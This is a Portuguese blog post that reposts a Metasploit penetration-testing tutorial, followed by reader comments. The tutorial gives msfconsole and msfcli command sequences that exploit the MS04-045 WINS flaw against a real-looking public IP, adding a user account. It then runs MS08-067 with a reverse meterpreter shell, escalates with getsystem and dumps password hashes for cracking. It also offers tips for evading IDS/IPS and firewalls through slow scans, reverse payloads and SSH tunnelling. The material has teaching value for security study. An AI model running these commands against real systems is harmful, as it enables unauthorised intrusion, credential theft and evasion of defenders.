tutorial detalhado em guia prático do metasploit - copiado

12
16/12/13 Tutorial detalhado em guia prático do Metasploit - Copiado. | Coruja de TI blog.corujadeti.com.br/tutorial-detalhado-em-guia-pratico-do-metasploit-copiado/ 1/12 Home Sobre Contato VideoCast Na mídia Cursos Coruja de TI Tuesday, 17 de December de 2013 Buscar Arquitetura Cloud Computing Destaques Linux Livros Redes Trabalho e Tendências Virtualização Tutorial detalhado em guia prático do Metasploit – Copiado. por Gustavo Lima + em26/05/11 às 5:28 pm O tutorial abaixo é uma cópia exata do site portugualaprogramar e em minhão opinião é um dos melhores para língua portuguesa. O original poderá ser acessado no seguinte link . Nenhuma palavra ou vírgula foi alterada do original, restando somente o meu apoio e parabéns quanto ao excelente trabalho feito pelo herakty , autor deste excelente tutorial. Vale lembrar que este tutorial está em português de Portugal. O Metasploit é um framework criado por H.D.Moore, que serve para elaboração e execução de um repositório de exploits. Os meus maiores agradecimentos ao H.D. Moore e sua equipe por tornarem um sonho realidade Agora que todos já sabem o que é o Metasploit, vamos aprender a trabalhar com ele. Lembrando que este tutorial só tem o objectivo de aprendizagem, cada um é responsável pelos seus actos. De qualquer forma, e devido a certos requesitos dos testes de intrusão deverão usar sempre proxy a não ser que usem um Lab com VM´s Uma das coisas que hoje já existe no metasploit é uma interface gráfica via browser que simplifica o processo, apesar de aconselhar a usarem o cliente tipo linha de comandos (msfcl) A interface gráfica é o msfweb – Interface gráfica via browser Vou usar o linux mas há também a versão para windows. Então levando em consideração que tenham instalado no vosso PC e está a funcionar, vamos dar uma vista sobre a utilização desta SUPER PODEROSA FERRAMENTA… um sonho tornado realidade… para mim que ainda me lembro quando para fazer isto era preciso dezenas de tools e procedimentos… agora tá tudo integrado numa plataforma/framework. Vou também ter o cuidado de usar vulnerabilidades antigas e exploits ultrapassados para que não possa ser usado como guia total para um ataque, visto cobrir todo o percurso de exploitation. Mas basta seleccionar outros exploits para as novas coisinhas… Vejam também a, digamos, o irmão web que é a excelente w3af “Web Application Attack and Audit Framework.” Apesar do metasploit também estar preparado para ataques web, mas eu especializeime nos dois e é melhor trabalhar com as duas em conjunto. O metasploit possui várias ferramentas dentre elas: (e muitas mais para vocês explorarem… explorem os payloads, os exploits e todos os outros utilitários. Podem fazerlo lendo ou explorando nos ficheiros ou com comandos do tipo “show payloads” ou “show exploits”, entre outros.) msfconsole – metasploit em modo console msfcli interface de automatização de penetração e exploração msflogdump – exibe sessões de arquivos de log msfplayload usado para gerar payloads customizados

Upload: jorge-willians-caroline-ferreira

Post on 24-Oct-2015

59 views

Category:

Documents


9 download

TRANSCRIPT

Page 1: Tutorial detalhado em guia prático do Metasploit - Copiado

16/12/13 Tutorial detalhado em guia prático do Metasploit - Copiado. | Coruja de TI

blog.corujadeti.com.br/tutorial-detalhado-em-guia-pratico-do-metasploit-copiado/ 1/12

HomeSobreContatoVideoCastNa mídiaCursos

Coruja de TITuesday, 17 de December de 2013

Buscar

ArquiteturaCloud ComputingDestaquesLinuxLivrosRedesTrabalho e TendênciasVirtualização

Tutorial detalhado em guia prático do Metasploit – Copiado.

por Gustavo Lima+ em 26/05/11 às 5:28 pm

O tutorial abaixo é uma cópia exata do site portugual­a­programar e em minhão opinião é um dos melhores para língua portuguesa. O original poderá seracessado no seguinte link. Nenhuma palavra ou vírgula foi alterada do original, restando somente o meu apoio e parabéns quanto ao excelente trabalho feitopelo herakty , autor deste excelente tutorial.

Vale lembrar que este tutorial está em português de Portugal.

O Metasploit é um framework criado por H.D.Moore, que serve para elaboração e execução de um repositório de exploits.

Os meus maiores agradecimentos ao H.D. Moore e sua equipe por tornarem um sonho realidade

Agora que todos já sabem o que é o Metasploit, vamos aprender a trabalhar com ele. Lembrando que este tutorial só tem o objectivo de aprendizagem, cadaum é responsável pelos seus actos.De qualquer forma, e devido a certos requesitos dos testes de intrusão deverão usar sempre proxy a não ser que usem um Lab com VM´s

Uma das coisas que hoje já existe no metasploit é uma interface gráfica via browser que simplifica o processo, apesar de aconselhar a usarem o cliente tipolinha de comandos (msfcl)A interface gráfica é o msfweb – Interface gráfica via browser

Vou usar o linux mas há também a versão para windows. Então levando em consideração que tenham instalado no vosso PC e está a funcionar, vamos daruma vista sobre a utilização desta SUPER PODEROSA FERRAMENTA… um sonho tornado realidade… para mim que ainda me lembro quando parafazer isto era preciso dezenas de tools e procedimentos… agora tá tudo integrado numa plataforma/framework.Vou também ter o cuidado de usar vulnerabilidades antigas e exploits ultrapassados para que não possa ser usado como guia total para um ataque, vistocobrir todo o percurso de exploitation. Mas basta seleccionar outros exploits para as novas coisinhas…

Vejam também a, digamos, o irmão web que é a excelente w3af “Web Application Attack and Audit Framework.”Apesar do metasploit também estar preparado para ataques web, mas eu especializei­me nos dois e é melhor trabalhar com as duas em conjunto.

O metasploit possui várias ferramentas dentre elas: (e muitas mais para vocês explorarem… explorem os payloads, os exploits e todos os outrosutilitários. Podem fazer­lo lendo ou explorando nos ficheiros ou com comandos do tipo “show payloads” ou “show exploits”, entre outros.)

msfconsole – metasploit em modo consolemsfcli ­ interface de automatização de penetração e exploraçãomsflogdump – exibe sessões de arquivos de logmsfplayload ­ usado para gerar payloads customizados

Page 2: Tutorial detalhado em guia prático do Metasploit - Copiado

16/12/13 Tutorial detalhado em guia prático do Metasploit - Copiado. | Coruja de TI

blog.corujadeti.com.br/tutorial-detalhado-em-guia-pratico-do-metasploit-copiado/ 2/12

msfpescan – utilizado para analisar e descompilar executáveis e DLLsmsfencode – um codificador interactivo de payload encodermsfupdate – utilizado para verificar e fazer download de actualização do frameworkmsfweb – Interface gráfica via browser

Hoje devido ao facto do metasploit estar na Rapid7 podem usar uma versão gratuita do detector de vulnerabilidades automático, o NeXpose CommunityEdition… ele detecta as vulnerabilidades e integra­se com o metasploit.

Nexpose (Detector de vulnerabilidades)http://www.rapid7.com/vulnerability­scanner.jsp

Podem, como eu, usar o Nessus para isso ou outras ferramentas… hoje até o nmap têm scripts para detectar vulnerabilidades, que são a principal questão noexploitation… é a partir de uma vulnerabilidade que tudo acontece e precisam saber a versão exacta do software alvo e do SO… em alguns casos nowindows até a língua em que o windows esta.Algo essencial para se escolher o exploit certo é saber o serviço e a versão exacta do mesmo, pois os exploits são feitos nessa base. Para tal e se soubermosjá que há uma vulnerabilidade para um apache 2 versão anterior à 2.15, podemos fazer um scan especifico com o Nmap a essa porta (80) para não dar nasvistas. É como se alguem tivesse a aceder ao site, pois apenas são enviados pacotes para a porta 80. Se fizerem um scan a todas as portas e houver algumequipamento de jeito no caminho vai detectar que é um scan e corta. Saibam o que procurar e não façam scans a todas as portas, a não ser que não hajaqualquer equipamento especial, como acontece na maioria dos datacenters para as contas mais baixas. As mais usadas .

Nmap –sT –P0 –A –version-all –T0 –p 80 ipalvo (o –T0 é para que haja maior espaço de tempo entre o envio de pacotes, para dificultar adetecção. Mas não é uma técnica de evasão e pode ser dispensado. O Nmap têm diversas técnicas de evasão, como spoofing, etc… explorem adocumentação)

Nessus (Detector de vulnerabilidades)http://www.nessus.org/nessus/O Nessus é um motor que interpreta scripts em NASL (ver artigo meu na 3ª Edição – Julho de 2006 que explica melhor esta linguagem) e envia­os contra umou mais alvos, fazendo um relatório dos resultados. Estes scripts procurar milhares de vulnerabilidades, mas apensa as conhecidas. Podem desenvolver osvossos próprios scripts NASL para coisas novas.

Voltando ao Metasploit, eu vou ensinar aqui a utilizar somente três destas ferramentas(msfconsole, msfcli, msfweb), pois acredito que um verdadeiro aprenderá sozinho o restante… como sempre dou a base para futuras explorações. Ajuda ao ensino e evita script kiddies

msfconsole:Primeiramente digita­se na linha de comando :

[root]#./msfconsolese for no windows só digite msfconsole sem ./, continuando deverá aparecer algo como: (neste caso já foi usado o comando “show exploits” para se ter umalista dos exploits. O comando show serve para outras coisas como payloads e opções. Ver em detalhe)

Para quem dá o primeiro passo pode executar o comando “help” para ver os comandos de consola. Atenção que isto são apenas os comandos de consola enão todas as suas funcionalidades.

Page 3: Tutorial detalhado em guia prático do Metasploit - Copiado

16/12/13 Tutorial detalhado em guia prático do Metasploit - Copiado. | Coruja de TI

blog.corujadeti.com.br/tutorial-detalhado-em-guia-pratico-do-metasploit-copiado/ 3/12

Como vimos na primeira imagem do mestasploit e a nivel formativo, pois no mundo a sério já saberão que exploit usar, será: show [opção] (a opção poderáser uma das que vos aparecerão senão digitarem nenhuma, como podem ver no exemplo em seguida

desta forma:

msf > showmsfconsole: show: requires an option: 'exploits', 'payloads', 'encoders', or 'nops'msf >Viram que apareceram as opções deste comando. O mesmo acontece com outros comandos, pois podem ir assim explorando a framework.

Para saberem quais os exploits que existem nesta framework (desde a ultima actualização, devem ir actualizando o metasploit que está em constanteevolução) basta digitar o comando:

msf >show exploits;

Para saber os payloads que existem neste framework basta digitar o comando: show payloads e assim por diante.

Então dentro do ambiente do metasploit escolhemos o exploit assim com o comando “use”:

Page 4: Tutorial detalhado em guia prático do Metasploit - Copiado

16/12/13 Tutorial detalhado em guia prático do Metasploit - Copiado. | Coruja de TI

blog.corujadeti.com.br/tutorial-detalhado-em-guia-pratico-do-metasploit-copiado/ 4/12

msf > use wins_ms04_045msf wins_ms04_045 >viram que eu escolhi o wins_ms04_045 e o prompt mudou ?. Utilizando para isto o comando: use

continuando…

Digitamos o nosso velho amigo : show , novamente para verificar quais atributos ele aceita . Vejamos:

msf wins_ms04_045 > showmsfconsole: show: specify 'targets', 'payloads', 'options', or 'advanced'msf wins_ms04_045 >Vimos aqui que ele aceita targets, payloads, options ou advanced.

Vamos verificar quais opções que este exploit já seleccionado aceita:

msf wins_ms04_045 > show options

Exploit Options===============

Exploit: Name Default Description-------- ------ ------- ------------------required RHOST The target addressrequired RPORT 42 The target port

Target: Target Not Specified

msf wins_ms04_045 >Este exploit aceita somente duas opções : o ip alvo e a porta alvo. ?

Agora deves estar a perguntar… como faço para utilizar isto. Simples, basta configurar o que o exploit aceita (há diferenças entre exploits e cada vez mais,pois mais complexidade e vectores são adicionados, diferenciando cada vez mais os exploits), lembrando que onde estiver escrito required, significa queestas opções tem que ser configuradas obrigatoriamente para o exploit funcionar. Continuando…

Façamos assim:

msf wins_ms04_045 > set RHOST 200.126.35.34RHOST -> 200.126.35.34msf wins_ms04_04>

msf wins_ms04_045 > set RPORT 42RPORT -> 42msf wins_ms04_045 >Vejam que utilizei a mesma porta que o valor por default…Agora teremos que seleccionar o payload para o nosso exploit. O payload nada mais é que um software acoplado ao exploit para fazer as mais variadastarefas.Digitamos então o comando para saber os payloads suportados pelo nosso exploit: show payloads

msf wins_ms04_045 > show payloads

Metasploit Framework Usable Payloads====================================

Page 5: Tutorial detalhado em guia prático do Metasploit - Copiado

16/12/13 Tutorial detalhado em guia prático do Metasploit - Copiado. | Coruja de TI

blog.corujadeti.com.br/tutorial-detalhado-em-guia-pratico-do-metasploit-copiado/ 5/12

win32_adduser Windows Execute net user /ADDwin32_bind Windows Bind Shellwin32_bind_dllinject Windows Bind DLL Injectwin32_bind_meterpreter Windows Bind Meterpreter DLL Injectwin32_bind_stg Windows Staged Bind Shellwin32_bind_stg_upexec Windows Staged Bind Upload/Executewin32_bind_vncinject Windows Bind VNC Server DLL Injectwin32_exec Windows Execute Commandwin32_passivex Windows PassiveX ActiveX Injection Payloadwin32_passivex_meterpreter Windows PassiveX ActiveX Inject Meterpreter Payloadwin32_passivex_stg Windows Staged PassiveX Shellwin32_passivex_vncinject Windows PassiveX ActiveX Inject VNC Server Payloadwin32_reverse Windows Reverse Shellwin32_reverse_dllinject Windows Reverse DLL Injectwin32_reverse_meterpreter Windows Reverse Meterpreter DLL Injectwin32_reverse_ord Windows Staged Reverse Ordinal Shellwin32_reverse_ord_vncinject Windows Reverse Ordinal VNC Server Injectwin32_reverse_stg Windows Staged Reverse Shellwin32_reverse_stg_upexec Windows Staged Reverse Upload/Executewin32_reverse_vncinject Windows Reverse VNC Server Inject

msf wins_ms04_045 >Eu vou escolher o primeiro payload, que faz com que seja adicionado remotamente um utilizador no sistema windows (como tenho dito tanto sobre ospayloads, hoje já há payloads para tudo e todos os SO´s… até uma shell especial para cracking que é o meterpreter)

O meterpreter é um complexo payload que é uma espécia de shell especial para cracking, com funcionalidades especificas para isso. Algo quejá falei bastante também.

Documento onde é detalhado técnicamente o meterpreter:http://www.nologin.org/Downloads/Papers/meterpreter.pdf

Caso queiram usar o meterpreter, na selecção do payload, escolham um com meterpreter, como por exemplo win32_reverse_meterpreter… isto vai criaruma sessão no alvo, com o meterpreter e como é reverse passa pelas firewalls, pois estas pensam que como vem de dentro da rede é confiável.

Assim:

msf wins_ms04_045 > set PAYLOAD win32_adduser joliePAYLOAD win32_adduser -> joliemsf wins_ms04_045>Vamos agora listar os sistemas operativos que serão os alvos: Utilizando o velho comando : show, só que agora assim: show targets

msf wins_ms04_045 > show targets

Supported Exploit Targets=========================

0 Windows 2000 English

msf wins_ms04_045 >

Só temos uma opcao aqui, somente o windows 2000 em ingles é vulneravel, mas tudo bem...

msf wins_ms04_045 > set TARGET 0TARGET -> 0msf wins_ms04_045 >tamos mesmo, mesmo, mesmo a um tirinho de caçadeira… valeu a pena chegar aqui… pois agora apenas falta uma coisa para completar nossa tarefa…Executar o nosso exploit, que é mais um pacote exploit (conjunto de várias coisas que antigamente se faziam em separado e com muito trabalho) do quesomente um exploit.

Digite somente: exploit (lindo não? Isto é “disparar” o exploit em direcção ao alvo. ATENÇÃO. Só usar alvos virutais ou máquinas voças

msf wins_ms04_045 > exploitE pronto…Acabamos a nossa primeira etapa, agora vamos passar para o msfcli.

O msfcli é utilizado para poder fazer tudo de uma só vez. Nao precisando do passo a passo descrito acima. Se nós ja conhecemos o exploit isto agilizamuito o nosso trabalho na linha de comando digitamos assim:

[root]#./msfcli wins_ms04_045 RHOST =200.156.23.25 RPORT=42 PAYLOAD=win32_adduser teste TARGET=0 Ee vejam que faz a mesma coisa que no modo console.Caso o exploit se direcione a um serviço sem previlégios especiais pode­se usar um exploit local para escalar previlégios ou os seguintes comandos dometerpreter. Atenção que neste caso terão de estar a usar o meterpreter (para isso terão na altura de selecção do payload escolher um especial com ometerpreter, como por exemplo win32_reverse_meterpreter)E na sessão do meterpreter usem os scripts já existentes para isso, como apresento em baixo.

meterpreter> use privmeterpreter> getsystemMais coisas interessantes que se podem fazer com o meterpreter em conjunto com outras ferrametas geniáis, como o LophtCrack ou o Cain e Abel paracrackar hashes de passwords.Has passwords estão codificadas mas podem ser “sacadas” e posteriormente crackadas… garanto que conseguirão algumas que não sejam muito fortes, o

Page 6: Tutorial detalhado em guia prático do Metasploit - Copiado

16/12/13 Tutorial detalhado em guia prático do Metasploit - Copiado. | Coruja de TI

blog.corujadeti.com.br/tutorial-detalhado-em-guia-pratico-do-metasploit-copiado/ 6/12

que é muito normal.

Por exemplo. Como fazer o dump das hashes das passowrds com o meterpreter e fazer o download para depois as crackarem com algum dos programasanteriormente mencionados.

.MSFConsole> use windows/smb/ms08_067_netapi> set PAYLOAD windows/meterpreter/reverse_tcp> set LHOST (meu Ip)> set RHOST (Ip Remoto)> exploit> getuid> hashdump> use -f cmd -cPara fazer downloads ou uploads dentro do meterpreter, entre o vosso PC e o alvo comprometido.

meterpreter> download arquivo1 arquivo2 pastaDestinometerpreter> upload arquivo1 arquivo2 pastaDestinoPara crackar as hashes eu uso o LOphtCrack. É só guardar o resultado do “hashdump” num .txt (meuHash.txt) e usa­lo no LOphtCrack. Garanto que terãoalgumas passwords interessantes.

(investiguem também a familia Pwdump… muito interessante para certas situações.)

Citar

pwdump is the name of various Windows programs that output the LM and NTLM password hashes of local user accounts from the SecurityAccount Manager (SAM). In order to work, it must be run under an Administrator account, or be able to access an Administrator account onthe computer where the hashes are to be dumped; so Pwdump does not compromise security. Most of these programs are open­source.

http://en.wikipedia.org/wiki/Pwdump (aqui são explicadas as várias “cores” e “sabores” e seus links)

Vamos passar para uma forma ainda mais fácil. Garanto que o ppl mais windows vão adorar esta forma, que é um GUI (Grafical User Interface… mas nomundo dos exploits? Sim… vejam)

Trata­se da ferramenta msfweb que quando executado permite fazermos tudo por uma pagina web, todas as funcionalidades aplicaveis estão lá.Para acederem ao GUI do metasploit façam:

[root]#./msfweb+----=[ Metasploit Framework Web Interface (ip:55555) Deixar correr… Abrir em seguida o browser e digitar o url: teu ip, localhost, 127.0.0.1… Mais a porta 55555

Seria assim: http://localhost:55555

E assim verão a magia desta ferramenta. Um rico GUI onde facilmente qualquer um pode configurar uma sessão completa, sem digitar comandos emconsolas. Claro que no alvo vão (ou não) usar a consola, pois é mais…

Poderemos com isto fazer tudo graficamente sem digitar comandos etc etc, somente seleccionando.

Para complementar e devido a essas novas IPS e IDS que detectam padrões de tráfego e podem ser actualizadas com as assinaturas dos novos exploits, aquifica um extra dedicado às novas appliances PANDACom um tunnel SSH o tráfego vai encriptado e não é possível identificar o mesmo, o que vai dentro dessa sessão.É uma das mais usadas técnicas de evasão,

Criando uma sessão meterpreter persistente sobre um túnel SSH (integrando com o metasploit)http://secnow.wordpress.com/2010/04/01/criando­uma­sessao­meterpreter­persistente­a­partir­de­um­tunel­ssh/

Podem ver muitos videos que até já apresentei alguns, com tudo isto em “real” e muito mais… investiguem por ai, pois há magia no ar

Post to Facebook111111111Post to Twitter1212121212121212

You may also like:

Page 7: Tutorial detalhado em guia prático do Metasploit - Copiado

16/12/13 Tutorial detalhado em guia prático do Metasploit - Copiado. | Coruja de TI

blog.corujadeti.com.br/tutorial-detalhado-em-guia-pratico-do-metasploit-copiado/ 7/12

Profile

Sign in with TwitterSign in with Facebookor

Name

Email Not published

Website

Comment

Post It

15 Replies15 Comments0 Tweets0 Facebook0 Pingbacks

Last reply was 11 11America/Sao_Paulo maio 11America/Sao_Paulo 2012

1. Roberto Soares (espreto)View 26 26America/Sao_Paulo maio 26America/Sao_Paulo 2011

Criei também ha algum tempo 2 tutorias sobre o Metasploit. Segue:

http://codesec.blogspot.com/2010/09/introducao­ao­metasploit­parte­01.html

e

http://codesec.blogspot.com/2010/02/metasploit­exploitation.html

Att,

2. j4ckSn00pyView 26 26America/Sao_Paulo maio 26America/Sao_Paulo 2011

excelete post gustavo!

mas o armitage quebra um galho e tanto hehe!

3. HélioView 26 26America/Sao_Paulo maio 26America/Sao_Paulo 2011

Parabéns pelo post Gustavo!

mas afinal… um exploit em si pode modificar/criar/apagar um arquivo?

Já ganhou o seu troféu joinha hoje ? Redes: Até aonde chegaremos? Coruja de TI recomenda a segunda edição do The RootkitArsenal: Escape and Evasion in the Dark...

PoC ­ Linux privilege escalation em vídeo Coruja de Ti indica o livro Descobrindo o Linux – 3ªEdição

Coruja de Ti Recomenda a segunda edição do livroWireshark Network Analysis

Page 8: Tutorial detalhado em guia prático do Metasploit - Copiado

16/12/13 Tutorial detalhado em guia prático do Metasploit - Copiado. | Coruja de TI

blog.corujadeti.com.br/tutorial-detalhado-em-guia-pratico-do-metasploit-copiado/ 8/12

4. mhac.k.e.rView 26 26America/Sao_Paulo maio 26America/Sao_Paulo 2011

Qual o objetivo de se copiar(ctrl+c) um tutorial inteiro e colar(ctrl+v) no seu site? coruja de TI mesmo fica só de olho no conteúdo e depois paste…

5. BrunoView 26 26America/Sao_Paulo maio 26America/Sao_Paulo 2011

Bom tutorial..”tamos mesmo, mesmo, mesmo a um tirinho de caçadeira…” rsrs

Roberto, eu aprendi a usar o mfs lendo seus tutoriais.

6. Gustavo LimaView 27 27America/Sao_Paulo maio 27America/Sao_Paulo 2011

Vi que é a primeira vez que vc acessou o blog.. Então, leia os outros 2304 posts e depois a gente conversa.. Veja também que já sorteei mais de 50livros, 20 cursos e vários brindes.. Como dizem na minha terra: Entrou no ônibus e já quer sentar na janela.

7. J4ckSn00pyView 27 27America/Sao_Paulo maio 27America/Sao_Paulo 2011

Nao sei qual o objetivo de um”hacker” vir ver um tutorial de metasploit e ainda reclamar….

Voce é o cara!

8. mrfilhoView 27 27America/Sao_Paulo maio 27America/Sao_Paulo 2011

Gustavo,

Parabéns pelo EXCELENTE site… Sem dúvida nenhuma é um dos melhores da Web. Visito­o sem pestanejar diariamente. Como você disse, nãovale nem a pena perder tempo com essa galera que “entra no ônibus e quer sentar na janela”….!!!

Continue escrevendo seus excelentes posts e filtrando o que tem na web e publicando para os seus seguidores – afinal, com o seu aval, é lógico quevou ler…!!!!

Abraços!

9. Tiago Ferreira de SouzaView 27 27America/Sao_Paulo maio 27America/Sao_Paulo 2011

Só uma curiosidade off topic, eu fui no link original e lá os caras estão se pegando a tapa nos comentários… rsrsrs….

10. Gustavo LimaView 27 27America/Sao_Paulo maio 27America/Sao_Paulo 2011

Valeu carinha..

11. dtomadonView 28 28America/Sao_Paulo maio 28America/Sao_Paulo 2011

Pô ia adorar sentar no corredor só pra aprender 10% do que essa galera aqui sabe, tô ralando muito atrás de informação e garanto que é difíciladentrar em alguns meios, quando aparece um pouco de informação devemos aproveitá­las ao máximo, pelo menos é o que faço.!!

12. IsraelView 23 23America/Sao_Paulo junho 23America/Sao_Paulo 2011

Trols, acho que é esse o nome que o pessoal designou à esses fakes. Bom, acho importante essas ações e mostra que também valorizamos o trabalhodos outros, obtendo permissão para divulga­los e atribuindo todos os créditos ao autor. Muito bom trabalho Gustavo.

13. Gustavo LimaView 23 23America/Sao_Paulo junho 23America/Sao_Paulo 2011

Page 9: Tutorial detalhado em guia prático do Metasploit - Copiado

16/12/13 Tutorial detalhado em guia prático do Metasploit - Copiado. | Coruja de TI

blog.corujadeti.com.br/tutorial-detalhado-em-guia-pratico-do-metasploit-copiado/ 9/12

Valeu Israel.

14. anonimoView 20 20America/Sao_Paulo fevereiro 20America/Sao_Paulo 2012

Eu usei metasploit de todas as maneiras possiveis e só consegui penetrar em uma maquina virtual usando xp sp2 desativando o firewall portando digoque esse metodo de invasão não presta!!!!!…esse negocio de furar firewall é cascata até mesmo sem maquina virtual não funfa tive que desativar ofirewall do xp.

15. cyberpunkView 11 11America/Sao_Paulo maio 11America/Sao_Paulo 2012

cara… ate q em fim um tour legal, q pode­se aplicar a backtrack tbm q é tudo integrado, para nao hein…rssr vlw !

ComentáriosDestaquesTags

Darwin: Eu não acredito q o nivel 5 era assim...Quando eu ...Gustavo Lima: Mas Tiago, neste caso vc alocará 8GB para huge. Nã...Gustavo Lima: Trabalhei com o Dalton.. :) Uma figura.. O livro ...Gustavo Lima: Obrigado pelas dicas. O Livro do Dr. já foi lido ...Tiago Albuquerque: "Eu sempre utilizado tenho 2048kb" , então mas com...

Assine o nosso RSS

Receber atualizações assim que postadas.

Seguidores

Page 10: Tutorial detalhado em guia prático do Metasploit - Copiado

16/12/13 Tutorial detalhado em guia prático do Metasploit - Copiado. | Coruja de TI

blog.corujadeti.com.br/tutorial-detalhado-em-guia-pratico-do-metasploit-copiado/ 10/12

Comentários

Darwin em Que tal vocês testarem os seus conhecimentos hacker no www.100security.com.br/wargame ?Gustavo Lima em WAF em ambientes com alto número de conexões dá merda, eu já disse issoGustavo Lima em WAF em ambientes com alto número de conexões dá merda, eu já disse issoGustavo Lima em WAF em ambientes com alto número de conexões dá merda, eu já disse issoTiago Albuquerque em WAF em ambientes com alto número de conexões dá merda, eu já disse issoTiago Albuquerque em WAF em ambientes com alto número de conexões dá merda, eu já disse isso

Navegue nos Posts

Metasploit Framework v3.5 – Acabou de sair do forno.Injector v3 – Ferramenta Cracker pós invasão.WebSploit Toolkit – um framework que utiliza os módulos do MetasploitMetasploit Framework v3.4.1 – Nova versãoDFC – um df ­k com estiloLearning Metasploit Exploitation and Development para consultaTreinamento Metasploit Exploitation à distânciaGerador de backdoor indetectável para backtrackBT Update – atualizado, melhorado e em portuguêsMetasploit: The Penetration Tester’s Guide

Page 11: Tutorial detalhado em guia prático do Metasploit - Copiado

16/12/13 Tutorial detalhado em guia prático do Metasploit - Copiado. | Coruja de TI

blog.corujadeti.com.br/tutorial-detalhado-em-guia-pratico-do-metasploit-copiado/ 11/12

Arquivos

dezembro 2013novembro 2013outubro 2013setembro 2013agosto 2013julho 2013junho 2013maio 2013abril 2013março 2013fevereiro 2013janeiro 2013dezembro 2012novembro 2012outubro 2012setembro 2012agosto 2012julho 2012junho 2012maio 2012abril 2012março 2012fevereiro 2012janeiro 2012dezembro 2011novembro 2011outubro 2011setembro 2011agosto 2011julho 2011junho 2011maio 2011abril 2011março 2011fevereiro 2011janeiro 2011dezembro 2010novembro 2010outubro 2010setembro 2010agosto 2010julho 2010junho 2010maio 2010abril 2010março 2010fevereiro 2010janeiro 2010

Contributors

Coruja de TI

Lista de Links

BI com VatapáBrainworkCCIE Service Provider – Bruno BarataDemonoidevilroutersnetfindersbrasilNotebooksNotebooks E AcessóriosOffice Snapshots

Page 12: Tutorial detalhado em guia prático do Metasploit - Copiado

16/12/13 Tutorial detalhado em guia prático do Metasploit - Copiado. | Coruja de TI

blog.corujadeti.com.br/tutorial-detalhado-em-guia-pratico-do-metasploit-copiado/ 12/12

OmediPortal TecnologiaPortalPHPProvas e Concursos PúblicosTechno BabbleTiago PassosUnderground LinuxVanini LimaYellow­Bricks

Profissionais TI

Concurso Público: TRT – Tribunal Regional do Trabalho – 2ª Região – SPRetrospectiva PTI 2013 – Artigos mais lidos e promoçõesConheça 10 áreas beneficiadas com a impressão 3DDa Internet que temos (IPv4) para a Internet que queremos (IPv6)Desenvolvimento versátil com Scrum

Tags

Amazon anonymous apache Ataques Back|Track Brasil CCNA Cisco Cloud Computing Cracker Curso cursos DataCenter DDOS DOS Evento Facebook googleHacker hackingday Internet JAVA Linux Livro Livros Mercado Metasploit Microsoft NGINX oys PenTest Performance Redes security Segurança Sorteiotecnologia TI Twitter Virtualização VMware vulnerabilidade vulnerabilidades Web Wowebook

Posts Recentes

Investigating Internet Crimes: An Introduction to Solving Crimes in CyberspaceReformulação no BlogWhatsApp Sniffer – interessante, mas juro que não sei se funcionaMetasploit Penetration Testing Cookbook, Second Edition Downloado resumo das discussões que rolam na lista Brasil­undergroundGanhador do livro de Git da Novatec

Comentários Recentes

Darwin em Que tal vocês testarem os seus conhecimentos hacker no www.100security.com.br/wargame ?Gustavo Lima em WAF em ambientes com alto número de conexões dá merda, eu já disse issoGustavo Lima em WAF em ambientes com alto número de conexões dá merda, eu já disse issoGustavo Lima em WAF em ambientes com alto número de conexões dá merda, eu já disse issoTiago Albuquerque em WAF em ambientes com alto número de conexões dá merda, eu já disse isso

Home | Sobre | Contato | Videocast

© Copyright Coruja de TI . Todos os direitos reservados .

Bad Behavior has blocked 13775 access attempts in the last 7 days.